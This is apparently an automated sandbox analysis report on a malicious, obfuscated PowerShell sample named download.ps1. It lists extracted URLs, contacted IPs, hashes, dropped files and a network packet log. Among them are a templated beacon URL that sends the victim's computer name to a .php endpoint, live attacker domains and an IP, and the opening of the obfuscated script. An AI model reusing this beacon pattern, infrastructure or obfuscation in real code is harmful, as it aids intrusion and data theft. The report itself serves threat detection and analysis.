00000000.00000002.1792974672.000001E282333000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E282650000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E282347000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://0.google.com/powershell.exe, 00000000.00000002.1792974672.000001E2817AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://www.google.com/webhp?tab=wwpowershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://schema.org/WebPageXpowershell.exe, 00000000.00000002.1792974672.000001E2817AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://contoso.com/powershell.exe, 00000000.00000002.1819810872.000001E29006F000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.1819810872.000001E29006F000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://www.google.com/finance?tab=wepowershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://maps.google.com/maps?hl=en&tab=wlpowershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.google.compowershell.exe, 00000000.00000002.1792974672.000001E28173F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E28175B000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://apis.google.compowershell.exe, 00000000.00000002.1792974672.000001E2817AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1819810872.000001E290228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E28175B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E281795000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1819810872.000001E290001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1819810872.000001E29006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E28194A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1792974672.000001E280001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.blogger.com/?tab=wjpowershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://$ckda40xjnqlemz6/$jqly5pcaxf6vo3g.php?id=$env:computername&key=$dhvyekza&s=527powershell.exe, 00000000.00000002.1792974672.000001E280228000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      unknown
                                                      http://www.google.com/mobile/?hl=en&tab=wDpowershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://play.google.com/?hl=en&tab=w8powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.1819810872.000001E29006F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://www.google.com/imghp?hl=en&tab=wipowershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://www.google.com/shopping?hl=en&source=og&tab=wfpowershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://lh3.googleusercontent.com/ogw/default-user=s96powershell.exe, 00000000.00000002.1792974672.000001E2817AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1819810872.000001E290228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E281795000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1819810872.000001E290001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1819810872.000001E29006F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.1792974672.000001E280228000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000000.00000002.1792974672.000001E280228000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.1792974672.000001E280228000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://drive.google.com/?tab=wopowershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://contoso.com/Iconpowershell.exe, 00000000.00000002.1819810872.000001E29006F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://0.googlepowershell.exe, 00000000.00000002.1792974672.000001E2817AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://mail.google.com/mail/?tab=wmpowershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.1792974672.000001E280228000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://www.youtube.com/?tab=w1powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://0.google.powershell.exe, 00000000.00000002.1792974672.000001E2817AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://lh3.googleusercontent.com/ogw/default-user=s96Xpowershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://www.google.com/logos/doodles/2024/seasonal-holidays-2024-6753651837110333-2xa.gifXpowershell.exe, 00000000.00000002.1792974672.000001E2817AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://crl.mpowershell.exe, 00000000.00000002.1829931432.000001E2F8F71000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://0.google.com/powershell.exe, 00000000.00000002.1792974672.000001E2817AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://lh3.googleusercontent.com/ogw/default-user=s24powershell.exe, 00000000.00000002.1792974672.000001E28194A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://www.google.com/history/optout?hl=enpowershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://books.google.com/?hl=en&tab=wppowershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://translate.google.com/?hl=en&tab=wTpowershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000000.00000002.1792974672.000001E280228000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://www.google.com/intl/en/about/products?tab=whXpowershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://calendar.google.com/calendar?tab=wcpowershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://aka.ms/pscore68powershell.exe, 00000000.00000002.1792974672.000001E280001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://lh3.googleusercontent.com/ogw/default-user=s24Xpowershell.exe, 00000000.00000002.1792974672.000001E28194A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                • No. of IPs < 25%
                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                • 75% < No. of IPs
                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                45.61.136.138
                                                                                                                gajaechkfhfghal.topUnited States
                                                                                                                40676AS40676USfalse
                                                                                                                172.217.21.36
                                                                                                                www.google.comUnited States
                                                                                                                15169GOOGLEUSfalse
                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                Analysis ID:1579870
                                                                                                                Start date and time:2024-12-23 13:16:07 +01:00
                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                Overall analysis duration:0h 4m 20s
                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                Report type:full
                                                                                                                Cookbook file name:default.jbs
                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                Number of analysed new started processes analysed:7
                                                                                                                Number of new started drivers analysed:0
                                                                                                                Number of existing processes analysed:0
                                                                                                                Number of existing drivers analysed:0
                                                                                                                Number of injected processes analysed:0
                                                                                                                Technologies:
                                                                                                                • HCA enabled
                                                                                                                • EGA enabled
                                                                                                                • AMSI enabled
                                                                                                                Analysis Mode:default
                                                                                                                Analysis stop reason:Timeout
                                                                                                                Sample name:download.ps1
                                                                                                                Detection:MAL
                                                                                                                Classification:mal60.evad.winPS1@2/7@2/2
                                                                                                                EGA Information:Failed
                                                                                                                HCA Information:
                                                                                                                • Successful, ratio: 100%
                                                                                                                • Number of executed functions: 16
                                                                                                                • Number of non-executed functions: 2
                                                                                                                Cookbook Comments:
                                                                                                                • Found application associated with file extension: .ps1
                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                                                                                                • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.63
                                                                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                • Execution Graph export aborted for target powershell.exe, PID 6624 because it is empty
                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                • VT rate limit hit for: download.ps1
                                                                                                                TimeTypeDescription
                                                                                                                07:17:00API Interceptor44x Sleep call for process: powershell.exe modified
                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                45.61.136.138download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                • gajaechkfhfghal.top/kqubowg9xhhtr.php?id=computer&key=39968631184&s=527
                                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                • gajaechkfhfghal.top/q9lpw6berahtr.php?id=user-PC&key=70313677457&s=527
                                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                • cmacnnkfbhlcncm.top/mes6v8wj5phtr.php?id=computer&key=28342894733&s=527
                                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                • cmacnnkfbhlcncm.top/tj9wps52g1htr.php?id=computer&key=19746202345&s=527
                                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                • cmacnnkfbhlcncm.top/cbym9z28drhtr.php?id=user-PC&key=95448541662&s=527
                                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                • cmacnnkfbhlcncm.top/jrmyitwlvqhtr.php?id=user-PC&key=69811902417&s=527
                                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                • cmacnnkfbhlcncm.top/kzqvgnd7b0htr.php?id=computer&key=74093808379&s=527
                                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                • cmacnnkfbhlcncm.top/yudn6r4exvhtr.php?id=computer&key=71902578316&s=527
                                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                • cmacnnkfbhlcncm.top/4sqjhclnathtr.php?id=user-PC&key=146061803000&s=527
                                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                • cmacnnkfbhlcncm.top/5jmw10tyqfhtr.php?id=user-PC&key=113750624201&s=527
                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                gajaechkfhfghal.topdownload.ps1Get hashmaliciousUnknownBrowse
                                                                                                                • 45.61.136.138
                                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                • 45.61.136.138
                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                AS40676USdownload.ps1Get hashmaliciousUnknownBrowse
                                                                                                                • 45.61.136.138
                                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                • 45.61.136.138
                                                                                                                loligang.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                • 107.176.168.244
                                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                • 45.61.136.138
                                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                • 45.61.136.138
                                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                • 45.61.136.138
                                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                • 45.61.136.138
                                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                • 45.61.136.138
                                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                • 45.61.136.138
                                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                • 45.61.136.138
                                                                                                                No context
                                                                                                                No context
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):64
                                                                                                                Entropy (8bit):1.1940658735648508
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Nlllul7got/Z:NllUkot
                                                                                                                MD5:71995B6B43EA2A2D49079E9E99E8D184
                                                                                                                SHA1:A55CE57E044A814007D3EE7DCCF1527EF391036A
                                                                                                                SHA-256:FD011C1349ABA970E984930A34129F61F60BF70A92E4E1748C4DCFFA3E22DFBF
                                                                                                                SHA-512:6CFBFC9B41995E53733EDCEC9747C4B7EA800D267145D6A879637CBC2B96E06C1D8CFEE9CDC59A6E57A32AEFE5A941448A029B16F4B2A11EF8CC0F579352509A
                                                                                                                Malicious:false
                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                Preview:@...e................................................@..........
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Reputation:high, very likely benign file
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Reputation:high, very likely benign file
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Reputation:high, very likely benign file
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):6221
                                                                                                                Entropy (8bit):3.7289812597319725
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:DdCG33CxHA5kvhkvCCtcuuSl7hHbuuSl7hHF:D4Gyg1cuvbuvF
                                                                                                                MD5:D352E0CBFD110D598EDF5CA3EDA9298C
                                                                                                                SHA1:AE92CB4D5ABBB11843E6263337B6566908564BC1
                                                                                                                SHA-256:D7FD8911CBD62CD68F4733DD6BE9D7F9B7C2ED239303002A1394FD0B28DE12C4
                                                                                                                SHA-512:64F564B4FE38B5CFFA9AF00AE7139EF15B782AE1E46097F973346DAF036B4D0B17539AC923DEAB2BAD0F323871B66B28BD6D1E8D0AA5C336A60EE07559B9C05C
                                                                                                                Malicious:false
                                                                                                                Preview:...................................FL..................F.".. ...-/.v.....5..4U..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....Y...4U..6...4U......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.b...........................%..A.p.p.D.a.t.a...B.V.1......Y.b..Roaming.@......CW.^.Y.b..........................Z,Y.R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^DW.`..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWP`..Windows.@......CW.^DWP`..........................0l$.W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^.Y.b....Q...........
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):6221
                                                                                                                Entropy (8bit):3.7289812597319725
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:DdCG33CxHA5kvhkvCCtcuuSl7hHbuuSl7hHF:D4Gyg1cuvbuvF
                                                                                                                MD5:D352E0CBFD110D598EDF5CA3EDA9298C
                                                                                                                SHA1:AE92CB4D5ABBB11843E6263337B6566908564BC1
                                                                                                                SHA-256:D7FD8911CBD62CD68F4733DD6BE9D7F9B7C2ED239303002A1394FD0B28DE12C4
                                                                                                                SHA-512:64F564B4FE38B5CFFA9AF00AE7139EF15B782AE1E46097F973346DAF036B4D0B17539AC923DEAB2BAD0F323871B66B28BD6D1E8D0AA5C336A60EE07559B9C05C
                                                                                                                Malicious:false
                                                                                                                Preview:...................................FL..................F.".. ...-/.v.....5..4U..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....Y...4U..6...4U......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.b...........................%..A.p.p.D.a.t.a...B.V.1......Y.b..Roaming.@......CW.^.Y.b..........................Z,Y.R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^DW.`..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWP`..Windows.@......CW.^DWP`..........................0l$.W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^.Y.b....Q...........
                                                                                                                File type:ASCII text, with very long lines (10697), with CRLF line terminators
                                                                                                                Entropy (8bit):6.005992831097856
                                                                                                                TrID:
                                                                                                                  File name:download.ps1
                                                                                                                  File size:18'916 bytes
                                                                                                                  MD5:6dc27c0ae6c260bbed7a9b00e3306263
                                                                                                                  SHA1:66d59a64b88b605d7fe887b4bcf7c9ea298fbb57
                                                                                                                  SHA256:fca7d47c39e4e5b1e375ff7497d67cfbd2bb4d2fa937c617f5a6b5c3c71ccb21
                                                                                                                  SHA512:11f4dcc0a45569b1e9a2a070945d9cb498d9eeb31550f405e0ac215b189ce2d5bb9d5d88cf2a6a1836418dcfd2e1e600a8e55a67ec2aaff555e2112310a8649f
                                                                                                                  SSDEEP:384:4pLgpYa4i8Kg9AIL/ncToT6wAs1Ix9w62G7P1jWZLdtjMd7G8j0:4MNRUAOcToT61sG9UG7P1jIxtj1T
                                                                                                                  TLSH:C8827C60334CE4F5D18AC9A3AD56BC083B21785BC1D7A9D0B7BCC5C67B899859F8CC02
                                                                                                                  File Content Preview:$nzdxguep=$executioncontext;$ininenoratreinisonalreen = -join (0..54 | ForEach-Object {[char]([int]"00000098000000970000010200000095000001010000009900000101000001000000010000000095000001010000009300000094000001000000009700000101000000990000010100000101000
                                                                                                                  Icon Hash:3270d6baae77db44
                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Dec 23, 2024 13:17:03.691520929 CET4973180192.168.2.445.61.136.138
                                                                                                                  Dec 23, 2024 13:17:03.811117887 CET804973145.61.136.138192.168.2.4
                                                                                                                  Dec 23, 2024 13:17:03.811197042 CET4973180192.168.2.445.61.136.138
                                                                                                                  Dec 23, 2024 13:17:03.816092014 CET4973180192.168.2.445.61.136.138
                                                                                                                  Dec 23, 2024 13:17:03.935630083 CET804973145.61.136.138192.168.2.4
                                                                                                                  Dec 23, 2024 13:17:05.122961998 CET804973145.61.136.138192.168.2.4
                                                                                                                  Dec 23, 2024 13:17:05.167236090 CET4973180192.168.2.445.61.136.138
                                                                                                                  Dec 23, 2024 13:17:05.265341043 CET4973280192.168.2.4172.217.21.36
                                                                                                                  Dec 23, 2024 13:17:05.386066914 CET8049732172.217.21.36192.168.2.4
                                                                                                                  Dec 23, 2024 13:17:05.386152029 CET4973280192.168.2.4172.217.21.36
                                                                                                                  Dec 23, 2024 13:17:05.386326075 CET4973280192.168.2.4172.217.21.36
                                                                                                                  Dec 23, 2024 13:17:05.507786036 CET8049732172.217.21.36192.168.2.4
                                                                                                                  Dec 23, 2024 13:17:07.207122087 CET8049732172.217.21.36192.168.2.4
                                                                                                                  Dec 23, 2024 13:17:07.207144022 CET8049732172.217.21.36192.168.2.4
                                                                                                                  Dec 23, 2024 13:17:07.207159996 CET8049732172.217.21.36192.168.2.4
                                                                                                                  Dec 23, 2024 13:17:07.207178116 CET8049732172.217.21.36192.168.2.4
                                                                                                                  Dec 23, 2024 13:17:07.207194090 CET8049732172.217.21.36192.168.2.4
                                                                                                                  Dec 23, 2024 13:17:07.207194090 CET4973280192.168.2.4172.217.21.36
                                                                                                                  Dec 23, 2024 13:17:07.207211971 CET8049732172.217.21.36192.168.2.4
                                                                                                                  Dec 23, 2024 13:17:07.207223892 CET4973280192.168.2.4172.217.21.36
                                                                                                                  Dec 23, 2024 13:17:07.207230091 CET8049732172.217.21.36192.168.2.4
                                                                                                                  Dec 23, 2024 13:17:07.207250118 CET4973280192.168.2.4172.217.21.36
                                                                                                                  Dec 23, 2024 13:17:07.207370043 CET8049732172.217.21.36192.168.2.4
                                                                                                                  Dec 23, 2024 13:17:07.207391024 CET8049732172.217.21.36192.168.2.4
                                                                                                                  Dec 23, 2024 13:17:07.207408905 CET8049732172.217.21.36192.168.2.4
                                                                                                                  Dec 23, 2024 13:17:07.207413912 CET4973280192.168.2.4172.217.21.36
                                                                                                                  Dec 23, 2024 13:17:07.207451105 CET4973280192.168.2.4172.217.21.36
                                                                                                                  Dec 23, 2024 13:17:07.327945948 CET8049732172.217.21.36192.168.2.4
                                                                                                                  Dec 23, 2024 13:17:07.328044891 CET8049732172.217.21.36192.168.2.4
                                                                                                                  Dec 23, 2024 13:17:07.328150988 CET4973280192.168.2.4172.217.21.36
                                                                                                                  Dec 23, 2024 13:17:07.332092047 CET8049732172.217.21.36192.168.2.4
                                                                                                                  Dec 23, 2024 13:17:07.385977983 CET4973280192.168.2.4172.217.21.36
                                                                                                                  Dec 23, 2024 13:17:07.393901110 CET8049732172.217.21.36192.168.2.4
                                                                                                                  Dec 23, 2024 13:17:07.448503971 CET4973280192.168.2.4172.217.21.36
                                                                                                                  Dec 23, 2024 13:17:07.448584080 CET8049732172.217.21.36192.168.2.4
                                                                                                                  Dec 23, 2024 13:17:07.448611021 CET8049732172.217.21.36192.168.2.4
                                                                                                                  Dec 23, 2024 13:17:07.448678017 CET4973280192.168.2.4172.217.21.36
                                                                                                                  Dec 23, 2024 13:17:07.515335083 CET8049732172.217.21.36192.168.2.4
                                                                                                                  Dec 23, 2024 13:17:07.515357971 CET8049732172.217.21.36192.168.2.4
                                                                                                                  Dec 23, 2024 13:17:07.515372992 CET8049732172.217.21.36192.168.2.4
                                                                                                                  Dec 23, 2024 13:17:07.515388966 CET8049732172.217.21.36192.168.2.4
                                                                                                                  Dec 23, 2024 13:17:07.515449047 CET4973280192.168.2.4172.217.21.36
                                                                                                                  Dec 23, 2024 13:17:07.515487909 CET4973280192.168.2.4172.217.21.36
                                                                                                                  Dec 23, 2024 13:17:07.570626020 CET8049732172.217.21.36192.168.2.4
                                                                                                                  Dec 23, 2024 13:17:07.570656061 CET8049732172.217.21.36192.168.2.4
                                                                                                                  Dec 23, 2024 13:17:07.570671082 CET8049732172.217.21.36192.168.2.4
                                                                                                                  Dec 23, 2024 13:17:07.570686102 CET8049732172.217.21.36192.168.2.4
                                                                                                                  Dec 23, 2024 13:17:07.570700884 CET8049732172.217.21.36192.168.2.4
                                                                                                                  Dec 23, 2024 13:17:07.570724010 CET8049732172.217.21.36192.168.2.4
                                                                                                                  Dec 23, 2024 13:17:07.570758104 CET8049732172.217.21.36192.168.2.4
                                                                                                                  Dec 23, 2024 13:17:07.570774078 CET8049732172.217.21.36192.168.2.4
                                                                                                                  Dec 23, 2024 13:17:07.570782900 CET4973280192.168.2.4172.217.21.36
                                                                                                                  Dec 23, 2024 13:17:07.570789099 CET8049732172.217.21.36192.168.2.4
                                                                                                                  Dec 23, 2024 13:17:07.570806980 CET8049732172.217.21.36192.168.2.4
                                                                                                                  Dec 23, 2024 13:17:07.570818901 CET4973280192.168.2.4172.217.21.36
                                                                                                                  Dec 23, 2024 13:17:07.570821047 CET8049732172.217.21.36192.168.2.4
                                                                                                                  Dec 23, 2024 13:17:07.570828915 CET4973280192.168.2.4172.217.21.36
                                                                                                                  Dec 23, 2024 13:17:07.570837975 CET8049732172.217.21.36192.168.2.4
                                                                                                                  Dec 23, 2024 13:17:07.570848942 CET4973280192.168.2.4172.217.21.36
